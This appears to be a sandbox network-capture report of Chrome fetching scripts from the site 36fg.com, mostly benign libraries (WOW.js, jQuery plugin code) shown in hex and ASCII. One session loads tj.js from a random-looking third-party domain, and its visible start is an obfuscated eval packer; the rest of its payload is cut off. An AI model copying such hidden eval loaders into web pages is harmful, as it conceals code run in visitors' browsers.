                                                        2025-03-15 00:17:57 UTC853INData Raw: 69 74 20 74 68 65 20 66 6f 72 6d 20 75 73 69 6e 67 20 41 4a 41 58 2e 0a 09 09 24 2e 61 6a 61 78 28 7b 0a 09 09 09 74 79 70 65 3a 20 27 50 4f 53 54 27 2c 0a 09 09 09 75 72 6c 3a 20 24 28 66 6f 72 6d 29 2e 61 74 74 72 28 27 61 63 74 69 6f 6e 27 29 2c 0a 09 09 09 64 61 74 61 3a 20 66 6f 72 6d 44 61 74 61 0a 09 09 7d 29 0a 09 09 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 0a 09 09 09 2f 2f 20 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 66 6f 72 6d 4d 65 73 73 61 67 65 73 20 64 69 76 20 68 61 73 20 74 68 65 20 27 73 75 63 63 65 73 73 27 20 63 6c 61 73 73 2e 0a 09 09 09 24 28 66 6f 72 6d 4d 65 73 73 61 67 65 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 65 72 72 6f 72 27 29 3b 0a 09 09 09 24 28 66 6f 72 6d 4d 65
                                                        Data Ascii: it the form using AJAX.$.ajax({type: 'POST',url: $(form).attr('action'),data: formData}).done(function(response) {// Make sure that the formMessages div has the 'success' class.$(formMessages).removeClass('error');$(formMe
                                                        2025-03-15 00:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.549770104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:57 UTC603OUTGET /static/js/wow.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:57 UTC1003INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:32 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae74-20df"
                                                        expires: Sat, 15 Mar 2025 02:28:22 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 35380
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wiDwN%2BcaB64D5iQmo%2FWf8tYYBAFnA3on0bD5AP%2F9ffYGN8zfSn%2FmxFFY6YNrDPMqPFIM8WhGrbGQU9QKmEMGlLqCMxc3cP7krsZ5jB8RjDHUDvEWJ6sBl%2FrrRn2U7ZI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4ad5d3aa3fe-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2073&min_rtt=2069&rtt_var=784&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1175&delivery_rate=1389814&cwnd=118&unsent_bytes=0&cid=52a4035e59c77a0c&ts=129&x=0"
                                                        2025-03-15 00:17:57 UTC366INData Raw: 32 30 64 66 0d 0a 2f 2a 21 20 57 4f 57 20 2d 20 76 31 2e 31 2e 33 20 2d 20 32 30 31 36 2d 30 35 2d 30 36 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 36 20 4d 61 74 74 68 69 65 75 20 41 75 73 73 61 67 75 65 6c 3b 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 62 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 67 3d 5b 5d 2e 69 6e 64 65 78 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 2c 63 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3b 63 3e 62 3b 62 2b 2b 29 69 66 28 62 20 69 6e 20 74 68 69 73 26 26 74 68 69 73 5b 62 5d 3d 3d 3d 61 29 72
                                                        Data Ascii: 20df/*! WOW - v1.1.3 - 2016-05-06* Copyright (c) 2016 Matthieu Aussaguel;*/(function(){var a,b,c,d,e,f=function(a,b){return function(){return a.apply(b,arguments)}},g=[].indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(b in this&&this[b]===a)r
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 6e 75 6c 6c 3d 3d 61 5b 63 5d 26 26 28 61 5b 63 5d 3d 64 29 3b 72 65 74 75 72 6e 20 61 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 4d 6f 62 69 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2f 41 6e 64 72 6f 69 64 7c 77 65 62 4f 53 7c 69 50 68 6f 6e 65 7c 69 50 61 64 7c 69 50 6f 64 7c 42 6c 61 63 6b 42 65 72 72 79 7c 49 45 4d 6f 62 69 6c 65 7c 4f 70 65 72 61 20 4d 69 6e 69 2f 69 2e 74 65 73 74 28 61 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 72 65 61 74 65 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 62 26 26 28 62 3d 21 31 29 2c 6e 75 6c 6c 3d 3d 63 26 26 28 63 3d 21 31 29 2c 6e 75 6c 6c 3d 3d 64 26 26 28 64 3d 6e 75 6c 6c 29 2c 6e 75 6c 6c 21 3d
                                                        Data Ascii: null==a[c]&&(a[c]=d);return a},a.prototype.isMobile=function(a){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(a)},a.prototype.createEvent=function(a,b,c,d){var e;return null==b&&(b=!1),null==c&&(c=!1),null==d&&(d=null),null!=
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 3d 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 65 79 73 2e 70 75 73 68 28 61 29 2c 74 68 69 73 2e 76 61 6c 75 65 73 2e 70 75 73 68 28 62 29 7d 2c 61 7d 28 29 29 2c 61 3d 74 68 69 73 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 7c 7c 74 68 69 73 2e 57 65 62 6b 69 74 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 7c 7c 74 68 69 73 2e 4d 6f 7a 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 7c 7c 28 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 26 26 6e 75 6c 6c 21 3d 3d 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64
                                                        Data Ascii: =b);return this.keys.push(a),this.values.push(b)},a}()),a=this.MutationObserver||this.WebkitMutationObserver||this.MozMutationObserver||(a=function(){function a(){"undefined"!=typeof console&&null!==console&&console.warn("MutationObserver is not supported
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 28 29 7b 76 61 72 20 61 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 69 6e 74 65 72 61 63 74 69 76 65 22 3d 3d 3d 28 61 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 29 7c 7c 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 3f 74 68 69 73 2e 73 74 61 72 74 28 29 3a 74 68 69 73 2e 75 74 69 6c 28 29 2e 61 64 64 45 76 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2c 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 74 68 69 73 2e 73 74 61 72 74 29 2c 74 68 69 73 2e 66 69 6e 69 73 68 65 64 3d 5b 5d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 3b 69 66 28 74 68
                                                        Data Ascii: (){var a;return this.element=window.document.documentElement,"interactive"===(a=document.readyState)||"complete"===a?this.start():this.util().addEvent(document,"DOMContentLoaded",this.start),this.finished=[]},e.prototype.start=function(){var b,c,d,e;if(th
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 28 77 69 6e 64 6f 77 2c 22 72 65 73 69 7a 65 22 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 48 61 6e 64 6c 65 72 29 2c 6e 75 6c 6c 21 3d 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3f 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 29 3a 76 6f 69 64 20 30 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 79 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 61 2e 6e 6f 74 53 75 70 70 6f 72 74 65 64 3f 74 68 69 73 2e 64 6f 53 79 6e 63 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 3a 76 6f 69 64 20 30 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 64 6f 53 79 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 3b 69 66 28 6e 75 6c 6c 3d 3d 61 26 26 28 61 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 31 3d
                                                        Data Ascii: (window,"resize",this.scrollHandler),null!=this.interval?clearInterval(this.interval):void 0},e.prototype.sync=function(b){return a.notSupported?this.doSync(this.element):void 0},e.prototype.doSync=function(a){var b,c,d,e,f;if(null==a&&(a=this.element),1=
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 61 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 28 29 7d 7d 28 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 65 74 53 74 79 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 3b 66 6f 72 28 64 3d 74 68 69 73 2e 62 6f 78 65 73 2c 65 3d 5b 5d 2c 62 3d 30 2c 63 3d 64 2e 6c 65 6e 67 74 68 3b 63 3e 62 3b 62 2b 2b 29 61 3d 64 5b 62 5d 2c 65 2e 70 75 73 68 28 61 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 76 69 73 69 62 6c 65 22 29 3b 72 65 74 75 72 6e 20 65 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 65 74 41 6e 69 6d 61 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 72 65 74 75 72 6e 20 61 2e 74 79 70 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65
                                                        Data Ascii: a)}:function(a){return a()}}(),e.prototype.resetStyle=function(){var a,b,c,d,e;for(d=this.boxes,e=[],b=0,c=d.length;c>b;b++)a=d[b],e.push(a.style.visibility="visible");return e},e.prototype.resetAnimation=function(a){var b;return a.type.toLowerCase().inde
                                                        2025-03-15 00:17:57 UTC1212INData Raw: 22 3a 62 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 61 63 68 65 41 6e 69 6d 61 74 69 6f 6e 4e 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 6e 69 6d 61 74 69 6f 6e 4e 61 6d 65 43 61 63 68 65 2e 73 65 74 28 61 2c 74 68 69 73 2e 61 6e 69 6d 61 74 69 6f 6e 4e 61 6d 65 28 61 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 61 63 68 65 64 41 6e 69 6d 61 74 69 6f 6e 4e 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 6e 69 6d 61 74 69 6f 6e 4e 61 6d 65 43 61 63 68 65 2e 67 65 74 28 61 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 63 72 6f 6c 6c 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 63 72 6f 6c 6c 65 64 3d 21 30 7d 2c 65
                                                        Data Ascii: ":b},e.prototype.cacheAnimationName=function(a){return this.animationNameCache.set(a,this.animationName(a))},e.prototype.cachedAnimationName=function(a){return this.animationNameCache.get(a)},e.prototype.scrollHandler=function(){return this.scrolled=!0},e
                                                        2025-03-15 00:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.549771104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:57 UTC603OUTGET /static/js/plugins.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:57 UTC985INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 760
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:40 GMT
                                                        etag: "60e7ae7c-2f8"
                                                        expires: Sat, 15 Mar 2025 01:09:45 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        accept-ranges: bytes
                                                        Age: 40097
                                                        cf-cache-status: HIT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4O88Ns2q9yWTIRPAMCC%2BohogffDFCXhKUXlAlorNGXFPftNdtTxH8qhECZm32NbgHjXo06L5a74gE%2BfZwtFtwsm2wIDh5i8MbDIrjsK69TTMiMt23LJ1xh0HMS3VYGs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4ad7d9cc4fb-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=2062&rtt_var=787&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1175&delivery_rate=1379310&cwnd=83&unsent_bytes=0&cid=d9468592bc3d122a&ts=143&x=0"
                                                        2025-03-15 00:17:57 UTC384INData Raw: 2f 2f 20 41 76 6f 69 64 20 60 63 6f 6e 73 6f 6c 65 60 20 65 72 72 6f 72 73 20 69 6e 20 62 72 6f 77 73 65 72 73 20 74 68 61 74 20 6c 61 63 6b 20 61 20 63 6f 6e 73 6f 6c 65 2e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 6d 65 74 68 6f 64 3b 0a 20 20 20 20 76 61 72 20 6e 6f 6f 70 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 7d 3b 0a 20 20 20 20 76 61 72 20 6d 65 74 68 6f 64 73 20 3d 20 5b 0a 20 20 20 20 20 20 20 20 27 61 73 73 65 72 74 27 2c 20 27 63 6c 65 61 72 27 2c 20 27 63 6f 75 6e 74 27 2c 20 27 64 65 62 75 67 27 2c 20 27 64 69 72 27 2c 20 27 64 69 72 78 6d 6c 27 2c 20 27 65 72 72 6f 72 27 2c 0a 20 20 20 20 20 20 20 20 27 65 78 63 65 70 74 69 6f 6e 27 2c 20 27 67 72 6f 75 70 27 2c 20 27 67 72 6f 75 70 43 6f 6c 6c 61 70 73 65
                                                        Data Ascii: // Avoid `console` errors in browsers that lack a console.(function() { var method; var noop = function () {}; var methods = [ 'assert', 'clear', 'count', 'debug', 'dir', 'dirxml', 'error', 'exception', 'group', 'groupCollapse
                                                        2025-03-15 00:17:57 UTC376INData Raw: 74 69 6d 65 6c 69 6e 65 45 6e 64 27 2c 20 27 74 69 6d 65 53 74 61 6d 70 27 2c 20 27 74 72 61 63 65 27 2c 20 27 77 61 72 6e 27 0a 20 20 20 20 5d 3b 0a 20 20 20 20 76 61 72 20 6c 65 6e 67 74 68 20 3d 20 6d 65 74 68 6f 64 73 2e 6c 65 6e 67 74 68 3b 0a 20 20 20 20 76 61 72 20 63 6f 6e 73 6f 6c 65 20 3d 20 28 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 20 7c 7c 20 7b 7d 29 3b 0a 0a 20 20 20 20 77 68 69 6c 65 20 28 6c 65 6e 67 74 68 2d 2d 29 20 7b 0a 20 20 20 20 20 20 20 20 6d 65 74 68 6f 64 20 3d 20 6d 65 74 68 6f 64 73 5b 6c 65 6e 67 74 68 5d 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 4f 6e 6c 79 20 73 74 75 62 20 75 6e 64 65 66 69 6e 65 64 20 6d 65 74 68 6f 64 73 2e 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 63
                                                        Data Ascii: timelineEnd', 'timeStamp', 'trace', 'warn' ]; var length = methods.length; var console = (window.console = window.console || {}); while (length--) { method = methods[length]; // Only stub undefined methods. if (!c


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.549764156.224.2.384436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:57 UTC656OUTGET /tj.js HTTP/1.1
                                                        Host: oudngmslhifnsf.gdmgcyy.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://www.36fg.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-15 00:17:57 UTC252INHTTP/1.1 200 OK
                                                        Server: openresty/1.21.4.3
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 805
                                                        Last-Modified: Sun, 19 May 2024 07:52:07 GMT
                                                        Connection: close
                                                        ETag: "6649afa7-325"
                                                        Accept-Ranges: bytes
                                                        2025-03-15 00:17:57 UTC805INData Raw: 3b 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c 65 2c 72 29 7b 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 63 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 7d 3b 69 66 28 27 30 27 2e 72 65 70 6c 61 63 65 28 30 2c 65 29 3d 3d 30 29 7b 77 68 69 6c 65 28 63 2d 2d 29 72 5b 65 28 63 29 5d 3d 6b 5b 63 5d 3b 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 5b 65 5d 7c 7c 65 7d 5d 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 27 5b 31 2d 35 37 2d 39 61 2d 67 5d 27 7d 3b 63 3d 31 7d 3b 77 68 69 6c 65 28 63 2d 2d 29 69 66 28 6b 5b 63 5d 29 70 3d 70 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 27 5c 5c 62 27 2b 65 28 63 29 2b 27 5c 5c 62 27 2c 27 67 27 29 2c 6b 5b 63 5d 29 3b 72 65 74
                                                        Data Ascii: ;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[1-57-9a-g]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);ret


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.549772104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:57 UTC600OUTGET /static/js/main.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:57 UTC1000INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:40 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7c-d43"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28898
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMQrT1%2FELFiwmH5LTC3g5acM6%2Fxz548WjnKUMHXXnS%2BHcAhi4pbM4Vf6P5aFsXztVYnLlEeg1MAjwuH0geF9gm98KGNSgy0gzzt%2BgdLs9IbcPVXQ5X6xWzMbbsMo2kY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4af4ed4728c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1864&rtt_var=714&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1172&delivery_rate=1516883&cwnd=165&unsent_bytes=0&cid=30f85d844a546183&ts=137&x=0"
                                                        2025-03-15 00:17:57 UTC369INData Raw: 64 34 33 0d 0a 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20 20 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 20 20 20 20 09 09 70 72 65 6c 6f 61 64 65 72 20 61 63 74 69 76 65 0a 20 20 20 20 20 20 20 09 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 0a 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 22 2e 70 72 65 6c 6f 61 64 65 72 22 29 2e 66 61 64 65 4f 75 74 28 35 30 30 29 3b 0a 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                        Data Ascii: d43(function ($) { "use strict"; /*---------------------------- preloader active ------------------------------*/ $(window).on('load', function () { jQuery(".preloader").fadeOut(500); }); /*---------------
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 63 72 6f 6c 6c 20 3d 20 24 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 73 63 72 6f 6c 6c 20 3c 20 32 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 22 2e 68 65 61 64 65 72 2d 61 72 65 61 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 74 69 63 6b 79 22 29 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 22 2e 68 65 61 64 65 72 2d 61 72 65 61 22 29 2e 61 64 64 43 6c 61 73 73 28 22 73 74 69 63 6b 79 22 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 20 20
                                                        Data Ascii: () { var scroll = $(window).scrollTop(); if (scroll < 2) { $(".header-area").removeClass("sticky"); } else { $(".header-area").addClass("sticky"); } }); /*----------------------------
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 74 65 6d 73 3a 20 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 33 36 31 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 74 65 6d 73 3a 20 32 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 35 37 36 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 74 65 6d 73 3a 20 32 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 37 36 38 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 74 65 6d 73 3a 20 33 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 31 30 30 30 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: { items: 1 }, 361: { items: 2 }, 576: { items: 2 }, 768: { items: 3 }, 1000: {
